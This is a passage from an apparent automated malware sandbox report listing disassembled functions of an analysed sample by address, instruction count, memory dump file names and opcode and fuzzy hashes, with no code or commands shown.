                              Function 0053A648 Relevance: .3, Instructions: 339COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                              • Instruction ID: b0d1b87c90f2b11850ef867d01e1fffc178e7a22b18df322e65262da6506c00b
                              • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                              • Instruction Fuzzy Hash: BEC16A76E29B824BD713873DD842265F794BFE7290F05D72EFCE472982EB2096818204
                              Function 0052AD38 Relevance: .3, Instructions: 302COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                              • Instruction ID: c5b42887a31d3354e4373278ed075d0cf12cbf5b063ce989c359f1d4c76d51c5
                              • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                              • Instruction Fuzzy Hash: 87D15874600B51CFE721CF29D494B67BBE0BF4A304F14892ED89A8BB91D735E846CB51
                              Function 0051D720 Relevance: .3, Instructions: 295COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                              • Instruction ID: 75d9c54a4f1519b8e2852fc63b63e3164a2b4baa798e5216dfc29e0baabf9593
                              • Opcode Fuzzy Hash: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                              • Instruction Fuzzy Hash: 72D13EB050C3808FE7148F15C0A476BBFE0BF95748F18895DE8D50B391C7BA8A49DB92
                              Function 005045A8 Relevance: .3, Instructions: 291COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                              • Instruction ID: dc3febb3439b7414badd70538b963f384022f8018ed03a304163d516935e1beb
                              • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                              • Instruction Fuzzy Hash: 37B18F72A083515BD308CF25C89136BF7E2FFC8310F1AC93EA99997291D778D9419A82
                              Function 004F1D78 Relevance: .3, Instructions: 291COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                              • Instruction ID: 8f4b0ddb904cec9213c1a6d1e77fce0029d97e14e4fea1ac75bd16ebde2ad189
                              • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                              • Instruction Fuzzy Hash: D4B1B372A083159FD308CF25C45076BF7E2EFC8310F1AC93EE99997291D778D9459A82
                              Function 008902E2 Relevance: .3, Instructions: 289COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4d6bb5d6922c0c1b91add66b8f401e3dfb83219626df7b078c989eb31b74c08e
                              • Instruction ID: 70d79bb2ef19a89d909952bf68039f5b32ec4c22586adcfac07ee82c4723fe6a
                              • Opcode Fuzzy Hash: 4d6bb5d6922c0c1b91add66b8f401e3dfb83219626df7b078c989eb31b74c08e
                              • Instruction Fuzzy Hash: BB9149F3A183049BF3086E2CDD957BABBD6EB94320F16463DD7C5837C4E93958018686
                              Function 004F2138 Relevance: .3, Instructions: 284COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                              • Instruction ID: db55c5b3d4b4846bc39f36dcfac6e3fc83aeb143d963a2467d445b946240b269
                              • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                              • Instruction Fuzzy Hash: 4CB15771A097158FD706EE3DC481229F7E1AFE6280F50C72EE995B7362EB71E8818744
                              Function 00531EE8 Relevance: .3, Instructions: 274COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                              • Instruction ID: ed1e4c93bfec33eb4818b1f4cb135b18ba223705b84864cf8c3cfe548b9ec4cb
                              • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                              • Instruction Fuzzy Hash: D491E671A006158FDF15CEA8DC84BBABBA0BF55300F194568ED18AB386D332DD05CBA2
                              Function 005496FD Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                              • Instruction ID: 27e33bee5de18799167dc5daec80d32ae433a8129cf5cb5e646b97f96ab04874
                              • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                              • Instruction Fuzzy Hash: 00B13C316106099FDB15CF28C48ABA67FE1FF45368F25865CE899CF2A2C335D991CB40
                              Function 0051B198 Relevance: .3, Instructions: 268COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                              • Instruction ID: 2f1df997b4f4e98c44e1b660c734744d5a9127419b1a0850bda6ea9f357b52ac
                              • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                              • Instruction Fuzzy Hash: 80C14A75A04B1A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
                              Function 0052D5A8 Relevance: .3, Instructions: 258COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                              • Instruction ID: 15f03982a21b2455b50c3555633e7358fb0e5aa19d6a2faa39d52b5454cd5332
                              • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                              • Instruction Fuzzy Hash: 1D9157319287A16AEB168B38D8417BABB64FFE7350F10C71AF988724A1FB7185818354
                              Function 0053D39E Relevance: .2, Instructions: 242COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                              • Instruction ID: f021be44a885cef4e3ea348cd48c16f1e810f781a826823d2ed44c0c0d1ca8cb
                              • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
